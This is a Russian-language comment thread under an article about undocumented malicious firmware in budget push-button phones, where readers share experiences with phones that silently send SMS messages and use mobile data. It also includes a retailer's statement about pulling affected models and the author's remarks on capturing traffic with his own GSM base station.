        <тег ХЗ>коммунизм в отдельно взятом Китае не отменяет капитализма в окружающем его мире. А как нам говорит народная мудрость - с волками жить, по-волчьи выть. То есть, ничем не гнушаются для сбора средств на R&D :)</тег ХЗ>


        1. TheShock
          03.09.2021 04:39
          +1

          То есть это был коммунизм, но виноват всё-равно капитализм?


          1. v-oz
            03.09.2021 06:31

            Таки заминусили XD

            Коммунизм там ещё не построили, конечно. И большой вопрос, собираются ли. Прошу не придираться, иначе это уйдёт от темы поста, а я минусовать не могу, хотя и хочется.

            Мне всё равно кто именно сделал такую прошивку, но она именно с целью наживы. Разве кроме тех, что отслеживают продажи. Но даже их следовало делать с уведомлением пользователя. А жажда наживы весьма характерна для капитализма. Надеюсь, с этим не будете спорить.


            1. TheShock
              08.09.2021 15:17

              Мне всё равно кто именно сделал такую прошивку, но она именно с целью наживы. 

              А может с целью шпионажа, которая характерна для тоталитарных коммунистических режимов?

              Коммунизм там ещё не построили, конечно


  1. anonymous
    00.00.0000 00:00


    1. ValdikSS Автор
      01.09.2021 10:52
      +2

      Ничего не ищется, приведите ссылку, пожалуйста.


  1. anonymous
    00.00.0000 00:00


    1. vadimk91
      01.09.2021 16:12

      Подобные звонки (GlobalStar и т.п.) были еще во времена, когда не было сотовых операторов. Тогда имел отношение в биллингу местного телекома, и подобные звонки со стационара многим жизнь попортило. Что их провоцировало - сейчас уже не вспомню.


      1. balamutang
        01.09.2021 18:35

        Т.н. диалер, вирус звонил через модем


  1. Earthsea
    01.09.2021 09:30
    +1

    Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности

    Но ведь Nokia это теперь тоже дикий китайский подвал. По сути из настоящих брендов остались только Alcatel, Philips, Panasonic, и то они вымирают. Моделей очень мало. И отзывы тоже надо внимательно читать, есть неудачные модели.


    1. CDK
      01.09.2021 09:41
      +2

      Philips разве не Китай уже давно?


      1. Earthsea
        01.09.2021 10:51

        Сходу я не нагуглил поэтому посчитал что нет. На самом деле действительно, и Philips, и Alcatel тоже давно китайские подвалы. Остается открытым вопрос о Panasonic.

        Похоже что фирмовых кнопочников не осталось уже совсем.

        Вот нашлась статья о продаже брендов в Китай: https://www.ferra.ru/review/mobile/most-popular-brands-bought-by-chinese.htm


    1. fedorez
      01.09.2021 10:51

      мобильники Alcatel это уже давно китайский TCL


    1. ValdikSS Автор
      01.09.2021 10:55

      Насколько понимаю, Philips и Panasonic заказывают разработку ПО у сторонних производителей.

      Современные кнопочные телефоны почти все сильно уступают хорошим трубкам 15-летней давности, если уж честно.


      1. vesper-bot
        01.09.2021 14:35

        Вот по поводу Philips я думаю, что ПО под них максимум портировано со старых кнопочников, разработкой там и не пахло. Купил недавно хениум какой-то для звонков, так ПО один в один кирпичная железяка, которую мне в 97м подарили вместе с тарифом 26 центов за минуту. Однако в свете этой статьи начинаю думать, что может быть это и хорошо...


    1. nebularia
      01.09.2021 11:55

      Samsung неплохие были, но в продаже их уже не видно...


    1. screwer
      01.09.2021 13:12

      Nokia это FIH. Там же делают и айфоны, в том же "подвале"))))


    1. den_po
      03.09.2021 01:09

      У Nokia есть и не "дикий китайский подвал", но получится ли заиметь такое для личного пользования, не знаю https://dac.nokia.com/user-equipment/


  1. Jsty
    01.09.2021 09:34
    +1

    Единственный выход - через оператора блокировать возможность выхода в интернет, как минимум.

    Что насчет смс и возможно ли точечно запретить их, не знаю. Технически, думаю, возможно (опять же через оператора) реализовать белый список номеров для отправки смс.

    Насколько я понимаю, даже с закладками в телефоне это условно "решит" проблему.


    1. askv
      02.09.2021 14:52

      У Мегафона блокировал интернет. Через какое-то время опять включили, без всякого уведомления.


    1. Tatikoma
      02.09.2021 17:28

      Тогда оно через bluetooth построит mesh-сеть и всё-таки утащит ваши личные данные с телефона. Одними блокировками сложно всё решить.


      1. YMA
        02.09.2021 17:40

        А устройства Apple не только через bluetooth смогут, там еще и UWB есть, а это быстрее и незаметнее. И квази-mesh у них уже имеется в продакшене, через которую AirTag и FindMy работают.


  1. v1000
    01.09.2021 09:41
    +8

    Я правильно понимаю, что официально продаются устройства, которые можно использовать как ботнет? Одно дело, когда это единичная отправка СМС после установки, другое дело, когда телефон позволяет выполнять запросы, подчиняясь командам извне.


  1. Veliant
    01.09.2021 09:55
    +1

    Спасибо за отличную статью!

    А нельзя ли на это обратить внимание ФСБ, т.к. это теоретически можно подвести под "Специальные технические средства... устройства, специальный инструмент и программное обеспечение для электронных вычислительных машин и других электронных устройств ... которым намеренно приданы качества и свойства для обеспечения функции скрытного (тайного, неочевидного) получения информации либо доступа к ней (без ведома ее обладателя)"


    1. blind_oracle
      01.09.2021 10:25
      +22

      У ФСБ много других важных дел - ловить иностранных агентов и прочих врагов народа. Ну и деньги зарабатывать. А не вот этой вашей фигнёй заниматься...


      1. ksr123
        01.09.2021 16:22
        +1

        А вы обращались в письменном виде?


  1. anonymous
    00.00.0000 00:00


  1. Ok_Lenar
    01.09.2021 10:38

    Dexp это дополнительный бренд DNS.


    1. SandroSmith
      03.09.2021 09:35

      И? В статье же и написано "DEXP SD2810 от российского бренда сети магазинов DNS."

      И это называется не доп.бренд, а СТМ - собственная торговая марка.


  1. LuigiVampa
    01.09.2021 10:41

    Респект автору за исследование. Действительно, разбирать активность подобных устройств технически очень непросто, а простор для мошенничества с ними получается очень большим, поскольку пользуются ими в основном люди, не подкованные технически.


  1. Nekun_V
    01.09.2021 10:57

    Официального ПО для Spreadtrum найти не удалось.

    Есть SPD Flash Tool, даже с сорцами.


    1. ValdikSS Автор
      01.09.2021 10:58

      Припоминаю, что там также возможность считывания флеша присутствует. Странно, что я забыл об этой программе.


  1. sourbarberry
    01.09.2021 11:20
    +1

    Покупайте только проверенные мировые бренды: телефоны Nokia не содержат вредоносной функциональности

    Кек) Помню был Nokia 5800, который при настройке после каждого хард-ресета отправлял СМС с информацией о активации в неизвестном направлении)


  1. SShtole
    01.09.2021 11:25
    +11

    Отсутствие в России специализированного министерства, которое бы занималось подобными проблемами.

    Тогда будет две проблемы.


  1. MikeVC
    01.09.2021 11:28

    Недавно ради любопытства вычищал от пакости кетайский смартфон. Пришлось выпилить абсолютно все включая звонилку и СМСилку. Т.е после этого телефон потерял возможность звонить! При этом сама система анlроид пытается куда-то ломиться. Правда, кол-во этого "левого" трафика стало пару сотен кб в месяц. System UI ломится на какой-то бла-бла-бла-amazon.com.cn


  1. vikarti
    01.09.2021 11:58

    Впору уже в обзорах телефонов указывать такой вот функционал.
    И — не понятно что собственно брать то если надо:


    • нормальный телефон для звонков / смс
    • не тормозящий
    • без таких вот пакостей и возможностей их случайно добавить даже пройдя по ссылке

    почему то в голову кроме старых iphone в голову ничего не идет (с софтом из аппстора там уже все плохо, но можно тупо не настраивать аккаунт, а даже если все же что-то найдется — откровенных троянов под не-рутованый айфон не бывает а при подозрении на рут — тупо залить прошивку.


    1. ars-1c
      06.09.2021 00:26
      +1

      Срочно нужен OpenWrt для кнопочников.


  1. SADKO
    01.09.2021 12:57
    +1

    Я помню как то из топовых Lenovo-в выковыривал закладку, которая могла приложения ставить не явно, и рекламу крутила в уведомлениях. Телефон покупался в Англии.


  1. screwer
    01.09.2021 13:14

    А можно где-нибудь скачать считанные прошивки ? Если с названиями/адресами распознанных функций (экспортнуть из ИДА'ы/гидры) - совсем прекрасно. Спасибо!


    1. ValdikSS Автор
      01.09.2021 15:05

      Ссылка 1, ссылка 2

      IDB'шки не хочу выкладывать в публичный доступ.


  1. Ole
    01.09.2021 14:01

    У меня есть кнопочный аппарат DEXP Larus C6  - внешне аналог Nokia 3310.

    Кто-нибудь анализировал наличие в нём подобных функций?

    Левых списаний денег с него я не регистрировал.


  1. RainbowJose
    01.09.2021 16:08

    Безукоризненно круто. Спасибо.


  1. LevOrdabesov
    01.09.2021 17:05

    Отключение «мобильного интернета» в личном кабинете опсоса должно, по идее, решить проблему?


    1. ValdikSS Автор
      01.09.2021 21:22

      Да, предотвратит отправку данных и снятие денег. А вот создание заведомо нерабочего APN вряд ли поможет — операторы связи игнорируют настройки, если введён несуществующий APN, и просто предоставляют обычный мобильный интернет, словно настроен правильный APN.


      1. hqqddy
        02.09.2021 10:18

        я будучи на мтс лет 6 назад через лк отключал смс сервис в принципе. но потом столкнулся с тем, что совсем без смс не легче, чем без инета. а включить самому в лк было невозможно, пришлось звонить на саппорт и доказывать, что я не удав (там вообще не могли понять, почему кому-то может понадобиться отключить смс сервис и что оказывается это можно отключить было самому). как сейчас там хз, давно на йоте. но было удобно в общем-то.


        1. rrrad
          02.09.2021 12:28

          можно в телефоне поломать настройки отправки смс. Я когдато так себе поломал отправку смс, когда лазил по настройкам и включил опцию "отправлять через интернет". При звонке оператору мне сказали эту опцию отключить и вбить указанный ими номер смс-центра.


          1. hqqddy
            02.09.2021 13:35

            вот мне было необходимо, чтобы смс не приходили.


      1. hqqddy
        02.09.2021 10:20

        а ну кстати, если телефон серый (я любитель, ну не серых, но тех, что у нас не продают моделей), то с кривым апн инета может и не быть, пока не пропишешь правильный. по крайней мере у меня уже не первый американский винфон без прописки апн мобильного инета не получает никак.


      1. ARD8S
        02.09.2021 21:44

        Запрещал инет для филипс зениум E255, отправлял куда-то смс (промелькивало быстро и нигде не оставалось) и данные небольшими объёмами, а оператор радостно списывал деньги за пакет интернета. Аппаратов покупал два (т.к. красивые и удобные), оба "белые", куплены в разное время и в разных местах, оба ведут себя одинаково.


  1. Akr0n
    01.09.2021 18:03
    +3

    А ведь подобного рода аппараты лежат в карманах всех военных\силовиков, т.к. позиционируются командованием как "безопасные" в отличие от смартфонов... Наличие закладок в них уже тянет на совсем другую статью УК.


  1. qeq0
    01.09.2021 21:47

    А как вы Wireshark подключили к кнопочному телефону и сняли GSM трафик?


    1. ValdikSS Автор
      01.09.2021 21:48
      +4

      Я поднял свою базовую станцию. Снятие GSM-трафика — штатная функция YateBTS (GSMTAP).


      1. ommunist
        05.09.2021 22:37
        +1

        А это не требует лицензии в России?


        1. zuek
          10.09.2021 10:31

          Требует. Но если никто не успел поймать, то прокатывает и так.


  1. Psionic
    01.09.2021 22:04

    У меня в Вадафоне тоже снимают деньги за выход в интернет, хотя эта симка в смартфоне отключена от интернета в настройках, только прием звонков (для инета другая симка).


  1. ILYA_ZX
    01.09.2021 23:10
    +1

    Очень интересное исследование, спасибо! Пару лет назад знакомый жаловался на смс вирус в кнопочном телефоне, но что все так плохо я и предположить не мог. По spreadtrum, считать прошивку и распаковать *.pac можно с помощью ResearchDownload. Разобрать/собрать stone сжатый LZMA:

    https://github.com/ilyazx/bzpwork


  1. spc
    01.09.2021 23:50

    На самом деле, в свете активности китайских товарищей, очень хочется понять: что они планируют делать со всей этой бигдатой? Или это просто вроде как местечковый активизм из анекдота про «получилось»?

    Или я чего-то не понимаю, или Китай — это просто другая планета, бесполезно даже размышлять над тем, зачем они влепили тот или другой бекдор туда или сюда.

    ps. Заодно пока передумал продавать T28.


    1. seruga46
      04.09.2021 15:43

      Как вариант - наладить взаимовыгодное сотрудничество с фейсбуком и подобными ему сайтами, где регистрация по телефону. Обмениваться с ними связками типа "IMEI-номер телефона". Чтобы когда пользователя в очередной раз по беспределу забанят ("ну а что, частная компания же, регистрация формально бесплатная, можем банить кого хотим и как хотим"), ему бы пришлось уже не только новую симку за 100-200 р покупать, а ещё и новую мобилу за 1000-2000. И за каждый бан часть денег от продажи новой мобилы нокла отдаёт фейсбуку.


  1. Thero
    02.09.2021 00:08
    +2

    а разве это не то с чем должен роскомнадзор воевать?


    1. wataru
      02.09.2021 15:53
      +1

      Роскомнадзор занят более политически полезными занятиями.


  1. Gazitdin
    02.09.2021 13:19

    Исследование уже попало в коммерсант.


    1. YMA
      02.09.2021 13:31

      И mobile-review процитировали...


  1. Endlesswind
    02.09.2021 13:48
    +14

    Добрый день.

    От имени компании ДНС выражаем благодарность автору статьи за проведённые исследования и статью. На основании предоставленных данных нами проводится внутреннее расследование. По итогам анализа причин возвратов и отзывов на сайте, некоторые модели телефонов временно сняты с продажи для проверки наличия данной проблемы и её устранения при обнаружении.


    1. ValdikSS Автор
      02.09.2021 14:13
      +14

      Надеюсь увидеть результаты расследования в публичном пространстве, с информацией о выгодоприобретателе СМС-подписки, цепочке разработки ПО и поставки устройств, а также мер по недопущению подобной функциональности в будущем.

      Обращайтесь, если нужны дополнительные подробности с моей стороны. Email есть в профиле.


      1. Popadanec
        06.09.2021 12:16

        Главное в ходе расследования не выйти на себя. А то бренд собственный, читать смски из другой страны китайцам вряд ли интересно.


  1. hecategram
    02.09.2021 14:06
    +2

    Ну об этом уже давно было известно. Все наши производители телефонов, это просто наклейка на телефоне и на коробке. Все делают китайцы. Что они туда пихают только им известно. И да за основу там взята прошивка BQ Наши якобы производители не имеют в своем штате технических инженеров. Получили образец и вперед продавать.

    Сами эти телефоны кстати ужасные в плане передачи звука. Если брать, то только если вы работаете на стройке, в хлеву и подобных местах. Чтобы не жалко было их грязными руками брать.

    Вопрос к автору. Вы не хотите китайские GSM модули для ардуино проверить. Что они там творят. А то у многих умные ворота подписки делают сами по себе ...


  1. Aleksid1
    02.09.2021 14:18

    Прекрасное и актуальное исследование! Спасибо.

    Вот так подаришь родителям вроде безопасный телефон, а получается...

    Я заметил только один момент - не факт что все телефоны проявили свои вредоносные возможности, вполне возможно у них может быть период выжидания - как раз от такого исследования, чтобы ничего не заподозрили.


  1. AeronLee
    02.09.2021 14:19
    -2

    Хорошая статья, только много чего не сходится.

    По мне, больше преследовалась цель обгадить одни фирмы и вывести вверх другие.

    Хотя не спорю, есть странные аппараты со странностями внутри.


    1. ValdikSS Автор
      02.09.2021 14:24
      +3

      Какие фирмы, по вашему мнению, я пытаюсь вывести вверх? У меня отпало желание пользоваться современными кнопочными телефонами: даже премиум-модели хуже стандартных устройств 15-летней давности по удобству и функциональности.


    1. steanlab
      03.09.2021 04:55
      +2

      делов то, взять bladeRF x115 и дополнить статью недостающими фирмами/вывести нужные вверх :)
      отличная статья с изобретательской новизной, такие на хабре несколько раз в году бывают.


  1. Gernar
    02.09.2021 14:28

    "...содержат нежелательные недокументированные функции." (с)

    "Результаты

    4 из 5 телефонов содержат незадекларированную функциональность..." (с)

    Если идет упор на незадекларированные функции, то как быть с тем, что в DEXP SD2810 прям в главном меню, никуда не прячась, находится раздел с платными подписками Funbox? И в инструкции даже об этом меню написано следующее: "Сервис представляет собой SMS подписку на различные тематические текстовые услуги. В SMS сообщении абоненту приходит текст по соответствующей тематике подписки. По умолчанию сервис отключён. "

    ???


    1. ValdikSS Автор
      02.09.2021 14:31
      +1

      Это документированная функция, которую можно вызвать из меню. Она отправляет СМС на другие номера, с другим текстом, пользователю выдаются стоимость подписки и действия для её отключения.

      СМС-подписки присутствуют во всех телефонах, кроме бабушкофона Irbis'а. Еще в телефонах присутствуют платные игры, которые покупаются также через СМС.


  1. SerjV
    02.09.2021 15:45
    +1

    Оооо, этой хабрстатье посвятили статью на синусе: safe.cnews.ru/news/top/2021-09-02_rossijskaya_roznitsa_zavalena

    ну по крайней мере автора указали, хотя по идее назвать источник им бы не помешало тоже (авторские права всё-таки...).



  1. prohodil_mimo
    02.09.2021 16:47
    +6

    Товарищ майор, я знаю, вы читаете эти строки! Займитесь, пожалуйста, этим вопросом. Потому что бэкдоры в телефонах по всей России, выполняющие команды с серверов в Китае и с продающимися на арабских сайтах доступами - это, хотя и не сильно нарушает уголовный кодекс в каждом отдельном случае, всё же не очень соответствует стратегии национальной безопасности.

    Автору - большое спасибо.


    1. Andrey_Green
      08.09.2021 14:02

      -) вы дали новую возможность товарищу майору теперь с Законом о национальном ПО

      Внедрять в продающиеся у нас телефоны прошивку с бэкдорами и шпионажем. Теперь только простив своих граждан.

      Вы оптимист, или считаете лучше стучать своим, чтобы чужие боялись?


  1. seruga46
    02.09.2021 22:37
    +3

    Потдверждаю, проблема существует, причём именно на НОКЛЕ (ладно, вот вам, nokia, чтобы поиском искалось, конкретная модель - 215 4G dual sim). Примерно раз в пару дней телефон самостоятельно выходит в интернет, несмотря на отключённую передачу данных везде в настройках. Особенно "весело" получается в роуминге: хочешь заплатить где-то через 3D-secure - заплати ещё пару сотен рублей опсосу (если телефон выключить, он, к счастью, в инет не лезет, но при включении, если последний раз включался "давно" - я не знаю, как точно измеряется "давно" - лезет сразу).


  1. Maccimo
    03.09.2021 03:05
    +1

    Хабрахабр — торт!


    descr:          Room 404

    Символично.


  1. spc
    03.09.2021 09:45
    +2

    И в ТАСС тоже есть читатели Хабра. Только им стыдно упоминать, что "один из пользователей...", поэтому они вытащили из коробки с нафталином целого Касперского.


  1. Maccimo
    03.09.2021 10:13

    Ни один из купленных телефонов не предоставляет полноценный AT-порт через USB или Bluetooth. Чтение SMS-сообщений с компьютера не реализовано нигде.

    Если SDK доступны, то наверняка доступны и рекомендации по разводке платы и обвязки. Что если поискать там? Возможно, что на некоторых платформах до этой функциональности можно достучаться.


  1. zergone
    03.09.2021 11:12

    У меня лежит живой Fly, который не включая экрана делал звонки за границу по нескольким номерам. Каждый звонок длился по-моему 10-40 секунд. Назвонил он мне больше 3000 р (года три назад). Когда копался в проблеме, видел в сети сообщения, что в представительстве Fly прошивку людям меняли бесплатно )


  1. zxosa
    03.09.2021 12:06
    +7

    https://www.dns-shop.ru/news/374ef223-0bc4-11ec-a2b1-00155dbd7634/

    Днс начал отзывную кампанию


    1. Popadanec
      03.09.2021 15:53

      Запахло жареным. По нашим законам продавец будет крайним и уже потом сам может судится с производителем.


  1. alecv
    04.09.2021 01:05
    +3

    Полагаю, старый iPhone 5 или даже 4 - лучший бабушкофон. Яркий, лёгкий, ломается и рутуется легко, запчастей навалом (принес ремонтникам посмеяться iPhone 5 вздутый как батончик, внутри все погнуто и сломано - починили зачем-то, взяли 1200 руб. замена дисплея, новая батарейка +выгиб платы назад, даже запустилась, +рихтовка корпуса).


  1. tormozedison
    04.09.2021 12:57

    Самым безопасным из пяти протестированных телефонов оказался самый дешёвый.

    А почему бы не организовать "Кноптест" по образцу "Ламптеста"? Разумеется, не только по этому показателю оценивать, но и по глючности, реальной ёмкости батареи, чувствительности, и др.


    1. zxosa
      04.09.2021 14:01

      Никому это не надо, реальные потребители этих устройств на форумы почти не заглядывают.


      1. seruga46
        05.09.2021 02:57

        Мне кажется, это ошибочный стереотип, что кнопочными телефонами пользуются только пенсионеры. Или вы думаете, что рост спроса на кнопочные телефоны - это резко выросло количество пенсионеров, а не резко выросли угрозы информационной безопасности и, соответственно, защиты от неё?

        Так что я думаю, что этот возросший спрос на кнопочные телефоны вполне пересекается с аудиторией хабра и форумов. Другое дело, что они могут по аналогичным причинам мало писать, чтобы не подставляться лишний раз, но читать - почему нет?


        1. JJBaltika
          11.09.2021 14:08
          -1

          Рост спроса это резкий приток закладчиков в городах нашей страны.


    1. Maccimo
      04.09.2021 15:46

      Лампы это расходник, а мобильный телефон — капитальные вложения на несколько лет.


      1. Popadanec
        04.09.2021 18:57

        Вот потому в магазинах почти сплошной шлак. Если бы люди покупали лампы с гарантией минимум 2-3 года и возвращали бы в случае поломки, то они бы стоили дороже не бракодельничали.


      1. rtkprg2
        06.09.2021 09:32
        +1

        эээ, нет! Лампы - это тоже капитальное вложение на несколько лет. Мы ведь не о лампах накаливания, а о высокотехнологичных светодиодных лампах. И цена таких ламп иногда приближается к цене мобильных телефонов.


        1. Popadanec
          06.09.2021 12:14

          Это телефоны приближаются по цене к лампам. А так полностью согласен. Каждый производитель заявляет о десятках тысяч часов ресурса, но у некоторых они системно даже 10% ресурса не отрабатывают.


    1. seruga46
      05.09.2021 02:57

      Поддерживаю, считаю, что кноптест нужен.


    1. nlykl
      05.09.2021 13:23

      Подозреваю, что первое место займет "нокия фонарик" с новым аккумулятором.


  1. ommunist
    05.09.2021 22:31

    Чтение SMS сообщений с компьютера было реализовано в SonyEricsson T68i . Была такая программка написанная если память не подводит Allan Odgaard, тем что потом написал TextMate. Nokia PC Suite вроде даже в CSV умел экспортировать SMSки.


    1. axe_chita
      06.09.2021 03:48

      Nokia PC Suite точно умеет сохранять смс в CSV, единственное не всегда корректно сшивал длинные СМС.


  1. vlmvlm
    06.09.2021 00:23

    Спасибо, отличный разбор. Вопрос от чайника: никакого файрволла для смартфонов в природе не существует? Если уж не с возможностью запрета, то хотя бы с логгингом и алармами.


    1. Chamie
      06.09.2021 11:54

      Для смартфонов — конечно существуют (NetGuard и прочие no-root, например, под Андроидом). Проблема в том, что в статье описываются не смарт-, а «dumb»-фоны.


  1. mosco
    06.09.2021 00:23

    Ну да , ну да, пошёл я нафиг... Пытался летом или весной посмотреть биллинг за месяц. так Билайн новую оферту предлагает принять. а по ней, тотальная слежка за пользователем... Не стал её принимать, сижу без распечаток теперь...


    1. therealman_tm
      09.09.2021 06:20

      Что бы самому не искать, не подскажите пункт? :)


  1. ViolinistMan
    06.09.2021 00:23

    Очень интересное исследование, спасибо. Работаю приемщиком в ломбарде цифровой техники, полезная информация для моей работы.


  1. Red_Lord
    06.09.2021 00:23
    -7

    Очередная проплаченная статья. На старых кнопочных телефонах нет такой проблемы.
    Как пользовался Sony Ericsson Elm, так и дальше буду.
    А пальцами в экран пусть тыкают обезьяны.


    1. Maccimo
      06.09.2021 12:45
      +2

      Что-то я не вижу Elm среди подопытных.


  1. pahom-ka
    07.09.2021 15:48
    +1

    Подтверждаю наличие бекдора. Видел даже вживую, в салоне МегаФона (по франшизе). Бэкдор модели "Косякова", так было написано на бейджике.

    Причём сработал даже без телефона.

    Купил симку, "бэкдор" вставила её в какой-то кнопочный телефон, что-то там понажимала, на мой вопрос "Что вы делаете?" ответила "Активирую сим-карту". Придя домой увидел, что "бэкдор" активировал подписку на 50р в день.


  1. freemanon
    08.09.2021 17:02

    ValdikSS, когда вы включили свою базовую станцию, то звонки и смс соседей пошли через вашу станцию? Получается с оборудованием за 650$ можно перехватить например смс-код от онлайн-банка? или это так не работает?


    1. Aelliari
      08.09.2021 18:03

      Его бс не включена в сеть оператора. Телефон либо благодаря сим-каре (можно и самому купить и "прошить"), либо тупо по самому сильному сигналу подключился. Обмен телефон-бс ему доступен. А вот обмен оператор-бс-телефон уже нет


    1. ValdikSS Автор
      09.09.2021 00:21

      когда вы включили свою базовую станцию, то звонки и смс соседей пошли через вашу станцию?

      Нет, я ограничил возможность подключения только моей SIM-картой, для всех остальных аутентификация не проходила.

      Получается с оборудованием за 650$ можно перехватить например смс-код от онлайн-банка?

      Вообще — да, если базовая станция использует шифрование A5/1 (а таких, судя по информации gsmmap.org за 2019, у МТС около 50%), и даже дешевле — то же самое можно проделать на Motorola C118 за $30 с aliexpress.


  1. dzvonkovskiy
    17.09.2021 23:56
    +3

    Подтверждаю кейс с телефонами BQ. В декабре 2020-го купил детям-дошкольникам кнопочные телефоны «BQ One Power 1846» на Ситилинке. Про наличие у телефонов GPRS был в курсе. Через несколько месяцев, просматривая статистику расходов, заметил списания за инет-трафик. Сначала думал дети что-то натыкали (в телефонах есть встроенные Java-игры), но списания происходили даже тогда, когда дети не прикасались к телефонам. Заметил, что еcли телефоны включены целый день, они сами что-то шлют в инет 2 раза в сутки по 1-2 Кб, за что списывается 5 р/сутки (тариф без инета). Пришлось полностью отключить услуги GPRS, WAP, MMS. После прочтения данной статьи. Стал внимательно просматривать историю СМС на телефонах и в статистике оператора. Увидел много СМС на короткие номера 1042, 9800, 5557, 7497, 4446, хотя ни я ни дети (они еще даже не умеют) их не отравляли, да папка исходящих СМС на телефоне пустая. Несколько часов назад приходит СМС с номера 4446 «неудалось подключить услугу». В исходящих СМС естественно пусто, в статистике оператора эту СМС вижу. В инете нахожу (https://gsmwiki.ru/chto-za-nomer/4446/), что номер 4446 принадлежит не оператору а компании I-free (https://i-free.com/). Видимо прошивку для моих телефонов делала именно компания I-free )))


    1. dzvonkovskiy
      18.09.2021 00:11
      +2